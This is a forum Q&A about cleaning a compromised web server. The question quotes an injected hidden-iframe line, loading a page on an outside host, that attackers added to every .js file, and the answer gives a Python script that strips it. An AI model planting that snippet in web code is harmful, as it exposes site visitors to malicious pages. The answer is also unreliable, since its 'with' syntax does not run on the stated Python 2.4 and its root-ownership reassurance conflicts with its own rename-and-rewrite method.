Home/ Questions/Q 5983599
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-22T22:15:15+00:00

Problem: I have web server that was recently compromised. They targeted javascript files. They

  • 0

Problem:
I have web server that was recently compromised. They targeted javascript files. They inserted the following snippet

document.write('<iframe src="http://lcbmc.co.uk/showthread.php?t=31540750" width="1" height="1" frameborder="0"></iframe>')

this was added to the top of every single .js file on the server.

Solution:
Write a script to open every javascript file on my server that checks for malicious code, removes malicious code, and finally saves the file.

Question:
What programming language should the script be written in? Will python work? I’m running python 2.4.3 on my server. If I run a python script under root will I have to worry about accidentally changing the owner permissions of the modified files?

Thanks

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    What programming language should the script be written in?

    Hardly matters.

    Will python work?

    Yes.

    If I run a python script under root will I have to worry about accidentally changing the owner permissions of the modified files?

    No. Not “accidentally”. You could change them if you did a really bad job coding.

    import os
import shutil
for path, dirs, files in os.walk( "some/root/dir" ):
    for f in files:
        name, ext = os.path.splitext( f )
        if ext == '.js':
            js= os.path.join( path, f )
            bak= js+"#"
            os.rename( js, bak )
            with open(bak,"r") as source:
                with open(js,"w") as target:
                    for line in source:
                        if '<iframe src="http://lcbmc.co.uk/showthread.php?t=31540750"' in line:
                            continue
                        target.write( line )

    Something like that should (more-or-less) work.

    if you need to set permissions or ownership, there are os module functions to allow settings file user, group, and permissions as appropriate.

    • 0